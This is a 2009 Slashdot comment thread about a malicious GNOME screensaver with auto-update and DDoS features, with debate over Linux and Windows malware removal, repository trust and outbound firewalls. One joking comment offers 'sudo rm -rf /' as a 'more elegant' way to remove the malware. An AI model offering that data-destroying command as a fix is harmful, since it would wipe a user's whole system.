  Samsung took back my unlocked bootloader because Google wants me to rent movies. They're both evil.
Re:Of course the ninja was infected... by royallthefourth · 2009-12-09 10:56 · Score: 2, Funny

He scurries in the darkness because he fears the light that is the Sun Source... Sinanju.
So Solaris users are unaffected?
auto-update by TheSHAD0W · 2009-12-09 11:01 · Score: 3, Insightful

Okay, this scares me.
1. What happens when a publisher includes auto-updating code, but not specific attack code, like the DDoS software in the mentioned examples? If discovered it will appear to be a security risk, but not specifically malicious...
2. What happens when a software developer produces some completely innocuous software, gets into the repositories - and then months down the road, produces an update with DDoS capability, and has the update pushed into the repositories and automatically distributed?
At least it was fixable. by supersloshy · 2009-12-09 11:04 · Score: 2, Insightful

Before trolls start yelling about how "OMGZ LINUX ISN'T SECURE HAHAHA" and things like that, let me tell you something: because GNU/Linux is so open and configurable, malware like this can be very easily removed. All you have to do is run a few commands in a terminal to remove this. On Windows and the like, things are so complicated that Anti-virus software is almost required to remove some of their malware. I am glad to use an OS that doesn't restrict me like that. :)

--
"Our country is not nearly so overrun with the bigoted as it is overrun with the broadminded." -Archbishop Fulton Sheen
1. Re:At least it was fixable. by PeanutButterBreath · 2009-12-09 11:18 · Score: 5, Insightful
  
  Before trolls start yelling about how "OMGZ LINUX ISN'T SECURE HAHAHA" and things like that, let me tell you something: because GNU/Linux is so open and configurable, malware like this can be very easily removed. All you have to do is run a few commands in a terminal to remove this.
  Before trolls start yelling about how "OMGZ WINDOZE AV SOFTWARE IS COMPLICATED HAHAHA" and things like that, let me tell you something: because Windows is so accessible, AV software like this can be very easily deployed. All you have to do is click a few icons in the Start Menu to remove this. Blah, blah, blah
  On Linux and the like, everything is simple if you already know what you want to do. Otherwise, you have to trust unaccountable internet entities to provide you abstruse commands to run and hope they aren't trying to trick you into doing even more damage to your system. It should be obvious why that is a no way to combat malware.
2. Re:At least it was fixable. by imerso · 2009-12-09 11:49 · Score: 2, Insightful
  
  Although I like Linux as well, I think you are somewhat wrong here. This specific malware is a basic one. Wait for the upcoming Linux malware generations, and try to keep your statement that it'll be easier to get rid from Linux... I can't see any difference, the malware author could patch your bin executables, wreak havok on your etc configuration files, and what not, considering the installer was running as admin. Think more about that.
3. Re:At least it was fixable. by Drakin020 · 2009-12-09 12:32 · Score: 5, Insightful
  
  Ah but here is the problem.
  To you, removing a virus from Linux is easy, because you are obviously an intelligent Linux user.
  (Someone posted above the removal instructions)
  For you to write out: sudo rm -f /usr/bin/Auto.bash /usr/bin/run.bash /etc/profile.d/gnome.sh index.php run.bash && sudo dpkg -r app5552
  seems like nothing at all, but what about the average computer user? Do you think they know what sudo is? Hell I don't use Linux and I have no idea what the shit any of that stuff means. So no, that would only work with someone who really knows what they are doing with Linux.
  Now on the flip side, you say...
  "On Windows and the like, things are so complicated that Anti-virus software is almost required to remove some of their malware"
  Ah, but this is going off the assumption that we are dealing with an average Windows user, not an expert user (Such as your self with Linux)
  An expert Windows user like myself would say "Removing Malware is easy, just go into the registry's run section, remove what looks suspicious, delete temp files, prefetch, and search for the malware running process (Example: virus.exe) in the registry, and delete it"
  Ah see that to me is easy, I've done things like that all the time, and it's just cake.
  So I guess the point I'm trying to make is that...To you, removing a virus like this from Linux can be really simple...to someone who knows Linux, but the same can be said to a Windows user...who knows about Windows.
  
  --
  The greatest revenge in life is massive success.
4. Re:At least it was fixable. by philipgar · 2009-12-09 12:44 · Score: 3, Interesting
  
  ah yes, because linux applications have never had holes allowing someone to get a shell on a system, and users are always running the most up to date kernel that has no root exploits available for it. The main difference between windows and linux is that the linux kernel has so many different versions, and not all distros are using the same one, so that it's hard to choose which kernel vulnerability to exploit. if 99% of people used linux, and were using the same distribution (with mostly the same kernel), believe me, these exploits would exist, and we would see viruses hitting linux machines over the network. Already, there exist worms that have targeted linux machines.
  
  And saying the problem is not in the kernel but the software applications doesn't cut it either. The same could be said for many of the windows issues, it's just that the software applications in question are in every install and part of the windows user environment. It's no different than applications that might be part of the ubuntu user environment (gnome, samba, etc) etc.
  
  Phil
5. Re:At least it was fixable. by DiegoBravo · 2009-12-09 12:46 · Score: 2, Insightful
  
  This kind of problem is not about Linux or Windows but about distro that added malware in some crap application. In order to avoid that:
  1) The typical crap software should not be allowed the same privileges as a typical user (why an screensaver should open sockets? remove files?) There are capabilities and several security options that nobody takes seriously
  2) The package system should allow only a predefined set of actions in the installation process. Currently it runs as root any package' script; that's the reason I avoid all .deb files as provided by software vendors but obviously the problem is worse if the malware comes from the distribution
6. Re:At least it was fixable. by maugle · 2009-12-09 13:00 · Score: 2, Interesting
  
  To bolster your point: How did they find the name of the package? Only someone knowledgeable in Linux could've found that out, or the various locations it installed itself to
  
  To refute your point: Malware can get its hooks into Windows in a variety of different ways, and removal often requires specialized tools. For example, I had to remove one of those hideous fake-antivirus programs from a neighbor's computer. Real antivirus was no help. MalwareBytes Anti-malware couldn't get rid of it. Going into Safe Mode and manually cleaning things out didn't even work. I had to search the Internet and use a specialized tool to finally uproot that crap. (And, while I trusted it, the removal tool could have also been malware, I had no way to tell)
  
  So: Linux gets infected, smart user can eliminate it. Windows gets infected, smart user still needs to rely on either antivirus or malware-specific removal tools.
7. Re:At least it was fixable. by FreelanceWizard · 2009-12-09 14:10 · Score: 5, Informative
  
  I'm afraid not. The reason this malware is easy to remove is because it doesn't do anything truly wretched, like patch libc and other applications, install a rootkit kernel module, and the like.
  Having dealt with Linux boxes that have been hit by automatic exploitation tools that go well out of their way to hide their presence, I can tell you that no matter what the operating system, the standard advice holds: once the machine is infected, the only sure way to get it back to a known state is to restore from a backup made prior to the exploitation or to wipe it completely and start over. I should also point out that these machines were rooted through the exploitation of previously-patched vulnerabilities in setuid services -- which is the exact same vector many Windows worms use, including Slammer and Conficker.
  The only difference between the tools I've run into and a full-on worm is that they run at the command of a cracker and scan IP address ranges of his choice. With a bare amount of automation, they could become very successful Linux worms, breaking into all those machines that, say, have old OpenSSH binaries that haven't been patched against its known remotely exploitable vulnerabilities.
  
  --
  The Freelance Wizard
8. Re:At least it was fixable. by armanox · 2009-12-09 17:01 · Score: 2, Informative
  
  Which is why we have anti-virus and such on Linux as well. A healthy dose of paranoia...
  
  --
  I'm starting to think GNU is the problem with "GNU/Linux" these days.
Re:Repositories! by binarylarry · 2009-12-09 11:06 · Score: 4, Insightful

Why? Because it's a sane method of delivering software, which is becoming widely used (i.e. Steam, iTunes Store, etc) vs the traditional "Herpes" model used by Windows?

--
Mod me down, my New Earth Global Warmingist friends!
What the summary didn't mention... by AlgorithMan · 2009-12-09 11:08 · Score: 5, Informative

What the summary didn't mention: the screensaver has been there less than 24 hours.
see pro-linux.de (german)

--
The MAFIAA is a bunch of mindless jerks who will be the first up against the wall when the revolution comes
Re:Repositories! by sopssa · 2009-12-09 11:10 · Score: 3, Insightful

Well do you really want the iPhone like only-approved-software app store for your computer? With no way to download software from anywhere else than that said approved app store.
Patch news... by ghostis · 2009-12-09 11:10 · Score: 2, Funny

The Gnome team is working with several university neurology departments to develop a patch for human nature that fixes this problem. It will be included in Gnome 4.

--

Computer Science is all about trying to find the right wrench to bang in the right screw. -T.Cumbo?
1. Re:Patch news... by refactored · 2009-12-09 13:01 · Score: 2, Funny
  
  The Gnome team is working with several university neurology departments to develop a patch for human nature that fixes this problem. It will be included in Gnome 4.
  Don't you mean "Genome 4"?
Re:Repositories! by wizardforce · 2009-12-09 11:23 · Score: 4, Informative

No one is being locked into the repositories. If they want they can go elsewhere to get their software. The repositories merely provide a reasonably safe set of software available for the user.

--
Sigs are too short to say anything truly profound so read the above post instead.
Re:The Elegance of Programming by sexconker · 2009-12-09 11:27 · Score: 3, Funny

There is an easier (read: more elegant) way to get rid of this Linux malware:
sudo rm -rf /
Pussies.
rm -rf /
works fine for me!
Spot the anachronism by welshbyte · 2009-12-09 11:31 · Score: 2, Insightful

Given that screensavers just help to drain your laptop battery, waste energy and have no practical use these days (unless these people have ancient monitors which are succeptible to screen burn) why do people keep using them and why are they still a feature of modern operating system distributions? Monitor and graphics card power saving features should be all that's needed.
1. Re:Spot the anachronism by the_womble · 2009-12-09 17:13 · Score: 2, Informative
  
  X-screensavers includes one that is supposed to reverse the LCD equivalent of screen burn. I run it occasionally. It makes the screen flicker, and will probably hospitalise any epileptic who sees it.
Re:Repositories! by slack_justyb · 2009-12-09 12:10 · Score: 2, Interesting

No but how about a balance between the two. Repos for what most people want. PGP signed debs for the 3rd parties. Straight deb for all those feeling frisky. It's not hard to warn people that, "Hey you're installing a unsigned package, chances are this will ruin your computer, sure you want to do that?" If a third party wants to distribute packages the least they can do is self-sign (bottom end), get a real cert (higher end).

The inherent problem with the iPhone is that you can only go to one store to buy apps (namely iTunes). With Repos you can pick and choose which stores you trust and which you don't. Much like how I choose if I want to buy software from BigBoxMart or BestStolen. The Internet in general could (since I am using a store analogy apparently) be seen as buying stuff off the street. Yeah, the stuff looks cool and at these bargain prices you can't beat. But I do need to exercise some caution when I flash my wallet to some guy hanging out the back of a van.

So yes, I agree, I'm not too hip on the one store to rule them all policy. But I do believe that the store concept actually has some utility to offer if given the ability to go to another store should I so choose later. I obviously don't want to exclude the random vendor on the street that is selling hand made crafts, or even the random kisok by the bus stop selling phones. I do however what to keep in mind the burly looking thug over there selling "Snoby" Radios. I think it is all a matter of getting people to get inside a way of thinking.

To me, and that only applies to me, Mac OSX screams "Hey buy more shiny Apple stuff" (Security by insulating ones self by coolness). Linux says to me "Hey subscribe to a Repo because we are always changing stuff and you want to have the latest build." (Security by trust of subscription [or maybe sheer geekness]). Windows just looks like, "Hey we're cool with everyone, you want herpes? No problem we're cool with that. Want to do really neat spreadsheets? We're cool with that too." (Insecurity by being a software whore. We're just trying to please everyone.)
"cleansing your system" by Lost+Race · 2009-12-09 12:40 · Score: 2, Insightful
For those affected, both sites also provide instruction on cleansing your system.
There's only one way to "cleanse" your system of malware once it's infected:
1. Boot from known-good media (i.e. pressed CD from OS distributor)
2. Block-erase hard drive(s)
3. Re-install OS
4. Restore documents from backup
Any malware that can auto-update itself can potentially install anything at all. It could, for example, set up a file-sharing node which caches illegal data files on your system.
1. Re:"cleansing your system" by istartedi · 2009-12-09 14:58 · Score: 2, Insightful
  
  You forgot to verify the BIOS checksum.
  Although most malware probably doesn't go that far, it seems like if I really wanted to "pwn yur box", I'd at least patch rm to not delete my executable and instead simply fool the user into thinking it was gone. Patch ps to not display the process.... and general other rootkit mischief. I'm not terribly familiar with that kind of thing, but I assume there are people who have made it their life's work to hide executables on Linux, whereas I KNOW there are people who've made it their life's work on Windows.
  The only real solution, IMHO, is to drop-kick the computer out the door and use parchment and a quil pen for all your correspondance. Let's see 'em hack the Amish.
  
  --
  For all intensive purposes, "whom" is no longer a word. That begs the question, "who cares"?
Security is like sex by argent · 2009-12-09 12:49 · Score: 3, Funny

Security is like sex. Once you're penetrated you're ****ed.
When you install software, you're having unsafe sex.
Don't do it lightly.
Interesting... by jonaskoelker · 2009-12-09 13:13 · Score: 2, Funny

Gnome team is working [...]] to develop a patch for human nature that fixes this problem.
I suspect they've decided that a free will is unusable and will replace it with sane defaults ;)
Good News by savvyart · 2009-12-09 21:49 · Score: 2, Funny

Finally, the year of Linux desktop is coming. Even malware authors are taking notice and creating trojans and sneakware, so indeed linux adoption is up, yay!
Linux needs a "Zone Alarm" like program by TractorBarry · 2009-12-09 22:29 · Score: 2, Insightful

> keep itself updated via downloads
I keep boring people with this point and I'm going to keep doing so until the Linux peeps get it. Linux needs a program that performs the same function as Zone Alarm. In other words no program on a desktop system should be allowed to connect to the internet before the user has okayed it.
One of the first things I do when a non tehcnical friend asks me to help with their Windows PC is to install Zone Alarm simply because it will prompt you before a programm cann connect to the network or internet. I then explain that if they don't know what a program is, or why it's trying to connect to the internet, don't let it. You can always change your mind later and you can always google it, or ask me, to find out what the program is and what it does.
This has stopped numerous malware infestation getting serious (i.e. downloading their real payload) I believe there's very little real malware nowadays that doesn't require 'net access to do it's work (reporting personal information such as credit card details, being a node in a botnet etc.) so having a gatekeeper between programs and the network should be a primary design consideration of all desktop systems.
Without this functionality it's just a matter of time before the first serious auto updating Linux virus problem occurs. It might well be harder to get a root infestation on a Linux box but does this matter ? A userland program can steal information, participate in a botnet etc. quite adequately for most purposes. If it's well written and consumes little in the way of resources a user probably wouldn''t even notice either.
On Windows Zone Alarm acts like a nightclub bouncer for 'net access. Meanwhile on Linux any old program gets full internet access without the user knowing a thing.

--
Sky subscribers are morons. They pay to be advertised at !
1. Re:Linux needs a "Zone Alarm" like program by Bent+Mind · 2009-12-10 00:28 · Score: 2, Informative
  
  Linux needs a program that performs the same function as Zone Alarm
  It is called Netfilter and it is built into the kernel. For low-level configuration, take a look at the iptables command. Several hundred programs offer "simpler" configuration tools, from command line to GUI. Take a look at the L7-filter for application layer packet classification.
  
  --
  Request a Linux Shockwave player here: http://www.macromedia.com/support/email/wishform/
2. Re:Linux needs a "Zone Alarm" like program by oojah · 2009-12-10 01:15 · Score: 2, Interesting
  
  I suspect the GP is talking about the interactive features of Zone Alarm. My understanding is that it only allows outgoing network traffic from known executables that the user has allowed. If an executable hasn't requested network access before, or if an executable that previously asked for access and was granted it but has now been modified (an upgrade/overwritten by malware/...) then Zone Alarm will ask the user again if network access should be granted. It also notes that the executable has previously asked for access and that the file has changed since the last access. L7 filtering is a good start, but it's the user interaction at the time of network access that makes Zone Alarm really useful.
  
  --
  Do you have any better hostages?